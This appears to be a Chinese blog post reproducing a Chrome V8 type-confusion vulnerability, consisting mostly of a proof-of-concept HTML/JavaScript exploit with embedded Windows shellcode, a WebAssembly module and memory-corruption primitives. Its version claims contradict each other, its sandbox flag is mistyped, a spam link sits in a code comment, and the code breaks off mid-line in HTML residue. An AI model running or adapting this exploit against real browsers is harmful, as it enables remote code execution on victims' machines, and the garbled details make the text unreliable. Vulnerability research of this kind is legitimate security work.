心得经验总结:漏洞复现CVE

简介: 心得经验总结:漏洞复现CVE

V8是由Google开发的开源高性能JavaScript引擎(采用C++编写),而80.0.3987.122之前浏览器中的V8实现存在类型混淆漏洞,攻击者可以通过精心制作的HTML页面对受害者进行内存攻击,引发远程命令执行。有报道称,目前已出现利用CVE-2020-6418进行攻击的事件。

影响版本:Google:Chrome: <=89.0.4389.114

利用条件:开启免沙箱模式(默认情况下开沙箱运行)

参考链接:

复现过程:

先检验一下漏洞是否存在:

cmd执行命令:

"C:\Program

Files\Google\Chrome\Application\chrome.exe" -sand-box

(以不开启沙箱的模式运行chrome浏览器)

查看chrome版本:

(最新版本的仍然存在该漏洞)

打开测试用的POC:

成功执行命令,打开了记事本,漏洞存在

POC:

Test.html:

function gc() {
  // Allocate a large number of throwaway buffers to put pressure on the heap
  // so the engine is pushed into running a garbage-collection cycle.
  // The buffers are never used; the function returns nothing.
  const ROUNDS = 0x80000;
  for (let round = 0; round < ROUNDS; round += 1) {
    const scratch = new ArrayBuffer();
    void scratch;
  }
}

let shellcode = 【0xFC, 0x48, 0x83, 0xE4, 0xF0, 0xE8, 0xC0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,

0x56, 0x48, 0x31, 0xD2, 0x65, 0x48, 0x8B, 0x52, 0x60, 0x48, 0x8B, 0x52, 0x18, 0x48, 0x8B, 0x52,

0x20, 0x48, 0x8B, 0x72, 0x50, 0x48, 0x0F, 0xB7, 0x4A, 0x4A, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0,

0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 0x20, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1, 0xE2, 0xED,

0x52, 0x41, 0x51, 0x48, 0x8B, 0x52, 0x20, 0x8B, 0x42, 0x3C, 0x48, 0x01, 0xD0, 0x8B, 0x80, 0x88,

0x00, 0x00, 0x00, 0x48, 0x85, 0xC0, 0x74, 0x67, 0x48, 0x01, 0xD0, 0x50, 0x8B, 0x48, 0x18, 0x44,

0x8B, 0x40, 0x20, 0x49, 0x01, 0xD0, 0xE3, 0x56, 0x48, 0xFF, 0xC9, 0x41, 0x8B, 0x34, 0x88, 0x48,

0x01, 0xD6, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0, 0xAC, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1,

0x38, 0xE0, 0x75, 0xF1, 0x4C, 0x03, 0x4C, 0x24, 0x08, 0x45, 0x39, 0xD1, 0x75, 0xD8, 0x58, 0x44,

0x8B, 0x40, 0x24, 0x49, 0x01, 0xD0, 0x66, 0x41, 0x8B, 0x0C, 0x48, 0x44, 0x8B, 0x40, 0x1C, 0x49,

0x01, 0xD0, 0x41, 0x8B, 0x04, 0x88, 0x48, 0x01, 0xD0, 0x41, 0x58, 0x41, 0x58, 0x5E, 0x59, 0x5A,

0x41, 0x58, 0x41, 0x59, 0x41, 0x5A, 0x48, 0x83, 0xEC, 0x20, 0x41, 0x52, 0xFF, 0xE0, 0x58, 0x41,

0x59, 0x5A, 0x48, 0x8B, 0x12, 0xE9, 0x57, 0xFF, 0xFF, 0xFF, 0x5D, 0x48, 0xBA, 0x01, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x8D, 0x01, 0x01, 0x00, 0x00, 0x41, 0xBA, 0x31, 0x8B,

0x6F, 0x87, 0xFF, 0xD5, 0xBB, 0xF0, 0xB5, 0xA2, 0x56, 0x41, 0xBA, 0xA6, 0x95, 0xBD, 0x9D, 0xFF,

0xD5, 0x48, 0x83, 0xC4, 0x28, 0x3C, 0x06, 0x7C, 0x0A, 0x80, 0xFB, 0xE0, 0x75, 0x05, 0xBB, 0x47,

0x13, 0x72, 0x6F, 0x6A, 0x00, 0x59, 0x41, 0x89, 0xDA, 0xFF, 0xD5, 0x6E, 0x6F, 0x74, 0x65, 0x70,

0x61, 0x64, 0x2E, 0x65, 0x78, 0x65, 0x00】;

var wasmCode = new Uint8Array(【0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11】);

var wasmModule = new WebAssembly.Module(wasmCode);

var wasmInstance = new WebAssembly.Instance(wasmModule);

var main = wasmInstance.exports.main;

// Eight-byte scratch buffer shared by the fLow/fHi/i2f/f2big/big2f helpers below.
var bf = new ArrayBuffer(8);

// Typed view over the scratch buffer; every helper reads and writes it little-endian.
var bfView = new DataView(bf);

function fLow(f) {
  // Write f into the shared scratch view as a little-endian IEEE-754 double
  // and return the unsigned 32-bit value held in bytes 0..3 (the low word).
  bfView.setFloat64(0, f, true);
  const lowWord = bfView.getUint32(0, true);
  return lowWord;
}

function fHi(f) {
  // Write f into the shared scratch view as a little-endian IEEE-754 double
  // and return the unsigned 32-bit value held in bytes 4..7 (the high word).
  bfView.setFloat64(0, f, true);
  const highWord = bfView.getUint32(4, true);
  return highWord;
}

function i2f(low, hi) {
  // Assemble a double from two 32-bit halves: `low` fills bytes 0..3 and
  // `hi` fills bytes 4..7 of the shared scratch view (little-endian); the
  // eight bytes are then read back as an IEEE-754 float64.
  const halves = [[0, low], [4, hi]];
  for (const [offset, word] of halves) {
    bfView.setUint32(offset, word, true);
  }
  return bfView.getFloat64(0, true);
}

function f2big(f) {
  // Reinterpret the IEEE-754 bit pattern of f as an unsigned 64-bit BigInt
  // by round-tripping it through the shared little-endian scratch view.
  bfView.setFloat64(0, f, true);
  const bits = bfView.getBigUint64(0, true);
  return bits;
}

function big2f(b) {
  // Inverse of f2big: store the 64-bit BigInt b into the shared scratch view
  // (little-endian) and read the same eight bytes back as an IEEE-754 double.
  bfView.setBigUint64(0, b, true);
  const value = bfView.getFloat64(0, true);
  return value;
}

class LeakArrayBuffer extends ArrayBuffer {

constructor(size) {

super(size);

this.slot = 0xb33f;

}

}

function foo(a) {

let x = -1;

if (a) x = 0xFFFFFFFF;

var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));

arr.shift();

let local_arr = Array(2);

local_arr【0】 = 5.1;//4014666666666666

let buff = new LeakArrayBuffer(0x1000);//byteLength idx=8

arr【0】 = 0x1122;

return 【arr, local_arr, buff】;

}

for (var i = 0; i < 0x10000; ++i)

foo(false);

gc(); gc();

【corrput_arr, rwarr, corrupt_buff】 = foo(true);

corrput_arr【12】 = 0x22444;

delete corrput_arr;

function setbackingStore(hi, low) {

rwarr【4】 = i2f(fLow(rwarr【4】), hi);

rwarr【5】 = i2f(low, fHi(rwarr【5】));

}

function leakObjLow(o) {

corrupt_buff.slot = o;

return (fLow(rwarr【9】) - 1);

}//代码效果参考:http://www.ezhiqi.com/zx/art_3696.html

let corrupt_view = new DataView(corrupt_buff);

let corrupt_buffer_ptr_low = leakObjLow(corrupt_buff);

let idx0Addr = corrupt_buffer_ptr_low - 0x10<span style="color:
